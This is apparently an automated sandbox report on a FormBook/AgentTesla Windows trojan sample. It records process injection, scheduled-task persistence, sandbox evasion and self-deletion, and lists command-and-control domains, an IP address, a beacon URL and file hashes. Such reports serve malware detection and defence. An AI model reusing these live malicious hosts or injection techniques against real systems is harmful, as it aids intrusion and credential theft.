          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Columns are the ATT&CK tactics; the number after a technique is the count of matching signatures in this report. Empty cells are marked with a dash.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 321 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 22 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 491397
Sample: 456yqMyHvT.exe
Startdate: 27/09/2021
Architecture: WINDOWS
Score: 100

The graph, rendered as a process tree (the number in parentheses is the graph's own node id):

Start (2)
  DNS/IP Info: www.desireezzplus.com (39); desireezzplus.com (41)
  Signatures: Found malware configuration (45); Malicious sample detected (through community Yara rule) (47); Multi AV Scanner detection for dropped file (49); 6 other signatures (51)
  -> 456yqMyHvT.exe 7 (11), started
       Created files: C:\Users\user\AppData\Roaming\dWAzsHjHs.exe, PE32 (33), dropped; C:\Users\user\AppData\Local\...\tmp9071.tmp, XML (35), dropped; C:\Users\user\AppData\...\456yqMyHvT.exe.log, ASCII (37), dropped
       Signatures: Detected unpacking (changes PE section rights) (63); Detected unpacking (overwrites its own PE header) (65); Uses schtasks.exe or at.exe to add and modify task schedules (67); Tries to detect virtualization through RDTSC time measurements (69)
       -> 456yqMyHvT.exe (15), started
            Signatures: Modifies the context of a thread in another process (thread injection) (71); Maps a DLL or memory area into another process (73); Sample uses process hollowing technique (75); Queues an APC in another process (thread injection) (77)
            -> explorer.exe (20), injected
                 DNS/IP Info: www.zaborski.pro 91.237.52.145, 49852, 80 BIZNESHOST-ASPL Poland (43)
                 Signatures: System process connects to network (likely due to code injection or exploit) (53)
                 -> WWAHost.exe (26), started
                      Signatures: Self deletion via cmd delete (55); Modifies the context of a thread in another process (thread injection) (57); Maps a DLL or memory area into another process (59); Tries to detect virtualization through RDTSC time measurements (61)
                      -> cmd.exe 1 (29), started
                           -> conhost.exe (31), started
       -> schtasks.exe 1 (18), started
            -> conhost.exe (24), started


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
456yqMyHvT.exe | 33% | Virustotal | -
456yqMyHvT.exe | 33% | ReversingLabs | Win32.Trojan.AgentTesla

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\dWAzsHjHs.exe | 33% | ReversingLabs | Win32.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.456yqMyHvT.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.456yqMyHvT.exe.d20000.0.unpack | 100% | Avira | HEUR/AGEN.1109526

          Domains

          No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.rspb.org.uk/wildlife/birdguide/name/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RB | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.themmbcollection.com/gst0/ | 3% | Virustotal | -
www.themmbcollection.com/gst0/ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
desireezzplus.com | 66.254.114.234 | true | true | - | unknown
www.zaborski.pro | 91.237.52.145 | true | true | - | unknown
www.desireezzplus.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.themmbcollection.com/gst0/ | true | 3% Virustotal; Avira URL Cloud: safe | low
http://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.rspb.org.uk/wildlife/birdguide/name/ | 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RB | WWAHost.exe, 0000000F.00000002.926336110.00000000046BF000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.fonts.com | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com | 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                      Contacted IPs


                                      Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
91.237.52.145 | www.zaborski.pro | Poland | | 198414 | BIZNESHOST-ASPL | true

                                      General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491397
Start date: 27.09.2021
Start time: 14:51:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 32s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 456yqMyHvT.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/4@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 29.9% (good quality ratio 26.4%)
• Quality average: 70.1%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.209.183, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.50.102.62
                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

Time | Type | Description
14:52:08 | API Interceptor | 1x Sleep call for process: 456yqMyHvT.exe modified

                                      Joe Sandbox View / Context

                                      IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
91.237.52.145 | Letter of Intent.exe | Get hash | malicious | Browse | www.zaborski.pro/m6ss/?7n=7/j0B0axwH2j3JBDP7CtO0aObcGJZ+oUQ/jluRQiGqQJKat0tYWa/1OyCbBuHL+N+Wiv&4hUtXx=3f-lGjm8UxNL

                                      Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
www.zaborski.pro | Letter of Intent.exe | Get hash | malicious | Browse | 91.237.52.145

                                      ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
BIZNESHOST-ASPL | Letter of Intent.exe | Get hash | malicious | Browse | 91.237.52.145
 | Axo7v2d4Ya.exe | Get hash | malicious | Browse | 91.237.52.247
 | KBzeB23bE1.exe | Get hash | malicious | Browse | 91.239.67.153
 | $RAULIU9.exe | Get hash | malicious | Browse | 91.239.67.153

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Roaming\dWAzsHjHs.exe | 201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsx | Get hash | malicious | Browse |

                                        Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\456yqMyHvT.exe.log
Process: C:\Users\user\Desktop\456yqMyHvT.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1309
Entropy (8bit): 5.3528008810928345
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
MD5: 542338C5A30B02E372089FECDC54D607
SHA1: 6FAD29FF14686FC847B160E876C1E078333F6DCB
SHA-256: 6CEA4E70947B962733754346CE49553BE3FB6E1FB3949C29EC22FA9CA4B7E7B6
SHA-512: FE4431305A8958C4940EB4AC65723A38DA6057C3D30F789C6EDDEBA8962B62E9C0583254E74740855027CF3AE9315E3001A7EEB54168073ED0D2AB9B1F05503A
Malicious: true
Reputation: moderate, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
C:\Users\user\AppData\Local\Temp\tmp9071.tmp
Process: C:\Users\user\Desktop\456yqMyHvT.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1642
Entropy (8bit): 5.181020070278833
Encrypted: false
SSDEEP: 24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGKDPtn:cbhK79lNQR/rydbz9I3YODOLNdq3HF
MD5: 270EAE4DAD8B2E88B410A217642952E6
SHA1: 14F2734C138B4B5E1F71EB262C19D9D8D6BFAB65
SHA-256: EF0067940C6DC3971D1971768F6BE91584F2F95B50754C5C1FACDF92FB1E1CB4
SHA-512: 3B3BBFF06C965D453ED8536B7CC46BEC625008721FB147F5C9B66AFE8873ED05A37566413C439F3D0AC1558246411CA372B00612137F4787DBF7DD047305645E
Malicious: true
                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
C:\Users\user\AppData\Roaming\dWAzsHjHs.exe
Process: C:\Users\user\Desktop\456yqMyHvT.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 1205248
Entropy (8bit): 6.865266394826885
Encrypted: false
SSDEEP: 24576:s9YKH24J/IJ1/BuQ1Pn8Q96oOxBEF+hZF+u:sue2G8tBd8Q96oO00Z
MD5: 001122F11AE95A3C00EB3E76541BC264
SHA1: 750E1254A82C6E21AB5CFBA176363F0112089F65
SHA-256: B25EF1151578640A5BB9E01FADA60A8792FC4D3E92F3DDABF19BA4CD6D630F57
SHA-512: F57ABFEE1A9264DAD15DCC70539BEB16C4BE5735CEE0F085B349D0093DF6997D185475EB47DA19265E6D2DCAF0D631CD7AF04FF31ACB3E0E030A2CB26AAA8655
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 33%
Joe Sandbox View:
• Filename: 201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsx, Detection: malicious, Browse
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@.................................d...W.......0............................................................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc...............b..............@..B........................H............T......j.........................................................3.}...T..o.Z.it....&.z<nw...Q..o.H|....e....(..@...>.._.2;t...E.YL.../0\....*....\e..q........%[_...G.... ..AF...u..?.].om=.G...)2..4......C..._.....4l...`..q....^?.....y..?Q.o8......)rRD.....u.sl...8q.}.T.i..o2<...N.F4..9...)..........sq..q......h.t_.gkg.G.{..M:/...F..k.F....n..+........|p.~-..L^.......+./.dh.Q..X....M. ..U.2....p9..F.I...R{1.@t.8@/c..s\...."..O;.<vv~u7..;?.?...
C:\Users\user\AppData\Roaming\dWAzsHjHs.exe:Zone.Identifier
Process: C:\Users\user\Desktop\456yqMyHvT.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.865266394826885
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: 456yqMyHvT.exe
File size: 1205248
MD5: 001122f11ae95a3c00eb3e76541bc264
SHA1: 750e1254a82c6e21ab5cfba176363f0112089f65
SHA256: b25ef1151578640a5bb9e01fada60a8792fc4d3e92f3ddabf19ba4cd6d630f57
SHA512: f57abfee1a9264dad15dcc70539beb16c4be5735cee0f085b349d0093df6997d185475eb47da19265e6d2dcaf0d631cd7af04ff31acb3e0e030a2cb26aaa8655
SSDEEP: 24576:s9YKH24J/IJ1/BuQ1Pn8Q96oOxBEF+hZF+u:sue2G8tBd8Q96oO00Z
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@................................

File Icon

Icon Hash: 138e8eccece8cccc

Static PE Info

General

Entrypoint: 0x50e9be
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61511506 [Mon Sep 27 00:49:10 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
